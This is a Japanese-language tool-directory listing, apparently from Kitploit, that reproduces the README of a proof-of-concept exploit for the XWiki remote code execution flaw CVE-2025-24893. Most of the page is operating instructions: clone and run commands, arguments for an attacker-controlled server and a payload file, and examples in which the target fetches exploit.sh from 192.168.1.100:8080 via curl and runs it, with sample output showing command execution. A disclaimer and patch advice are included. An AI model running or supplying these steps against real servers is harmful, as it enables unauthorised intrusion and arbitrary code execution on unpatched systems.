Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/570rmbr3ak3r/xwiki-cve-2025-24893-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育リモートアクセスツール
GitHub570rmbr3ak3r/xwiki-cve-2025-24893-poc

xwiki-cve-2025-24893-poc

CVE-2025-24893 の PoC

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
3141年前未レビュー

XWiki RCE エクスプロイト PoC (CVE-2025-24893)

概要

このリポジトリには、CVE-2025-24893 として特定された XWiki Remote Code Execution (RCE) 脆弱性の概念実証 (PoC) エクスプロイトが含まれています。この脆弱性により、攻撃者は SolrSearch エンドポイントへの巧妙に細工されたリクエストを利用して、対象の XWiki インスタンス上で任意のコードを実行できます。このスクリプトは HTTP と HTTPS の両ターゲットをサポートします。

⚠️ 免責事項: この PoC は教育および研究目的のみを意図しています。明示的な許可なくシステムに対してこのコードを不正に使用することは違法であり、非倫理的です。システムをテストする前に、必ず適切な許可を取得してください。

脆弱性の詳細

  • CVE ID: CVE-2025-24893
  • 影響を受けるコンポーネント: XWiki SolrSearch エンドポイント
  • 影響: リモートコード実行 (RCE)
  • アドバイザリ: GitHub Security Advisory

この脆弱性は、SolrSearch エンドポイントでのユーザー入力の不適切な処理に起因し、巧妙に細工されたペイロードを介して Groovy コードの注入を可能にします。この PoC は、攻撃者がこれを悪用して対象サーバー上で任意のコマンドを実行する方法を示しています。

前提条件

  • Python 3.x
  • 必要な Python ライブラリ: requests、argparse、urllib.parse、re、html
  • CVE-2025-24893 の影響を受ける XWiki インスタンス
  • 攻撃者が制御するサーバー (bash スクリプトをホストするため、HTTP または HTTPS でアクセス可能)
  • 対象上で実行するコードを含むファイル

インストール

  1. このリポジトリをクローンします:
    root@kitploit:~
    git clone https://github.com/570RMBR3AK3R/xwiki-cve-2025-24893-poc.git
    
  2. 必要な Python ライブラリをインストールします:
    root@kitploit:~
    pip install requests
    

使用方法

スクリプトは、ターゲット XWiki インスタンスに巧妙に細工された HTTP/HTTPS リクエストを送信し、攻撃者が制御するサーバーからファイルを取得して実行する curl コマンドを実行する Groovy ペイロードを注入します。

次のコマンドでスクリプトを実行します:

root@kitploit:~
python3 exploit.py --url <target_url> --server <attacker_server> --file <malicious_file> [--no-verify]

引数

  • --url: ターゲット XWiki インスタンスのベース URL (例: http://target または https://target)。
  • --server: 攻撃者のサーバーの IP またはホスト名 (必要に応じてポートを含む) (例: 192.168.1.100:8080)。HTTP と HTTPS の両方をサポートします。
  • --file: 実行するコードを含む、攻撃者のサーバー上のファイル名 (例: exploit.sh)。
  • --no-verify: HTTPS ターゲットの SSL 検証を無効にするオプションのフラグ (注意して使用し、テスト目的のみ)。

例

root@kitploit:~
python3 exploit.py --url http(s)://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh

SSL 検証をバイパスするには (例: 自己署名証明書の場合):

root@kitploit:~
python3 exploit.py --url https://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh --no-verify

これにより、次の処理が行われます:

  1. Groovy スクリプトを使用して curl コマンドを実行するペイロードを構築します。
  2. 攻撃者のサーバー (http(s)://192.168.1.100:8080) から指定されたファイル (exploit.sh) を取得します。
  3. 取得したファイルをターゲットシステム上で実行します。
  4. 出力を抽出して表示し、HTML タグやエンティティを除去します。

出力

スクリプトはターゲットからのレスポンスを抽出し、HTML タグ (例: <br/>、<del>) を除去し、HTML エンティティを読みやすいプレーンテキストに変換します。クリーン化された出力がコンソールに表示されます。

サンプル

root@kitploit:~
python3 exploit.py --url http://<redacted> --server http://<redacted>:8080 --file exploit.sh 
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)

制限事項

  • ターゲットの XWiki インスタンスが CVE-2025-24893 の影響を受ける必要があります。
  • 攻撃者のサーバーはターゲットシステムから HTTP または HTTPS 経由でアクセス可能である必要があります。
  • スクリプトは、ターゲットサーバーが SolrSearch エンドポイントと Groovy 実行をサポートしていることを前提としています。

緩和策

この脆弱性から保護するには:

  • XWiki を最新のパッチ適用済みバージョンに更新します。
  • 詳細な緩和手順については GitHub Security Advisory を参照してください。
  • ブログ記事 CVE-2025-24893 も参照してください。

ライセンス

このプロジェクトは MIT ライセンスの下で提供されています。詳細については LICENSE ファイルを参照してください。

ツールをダウンロード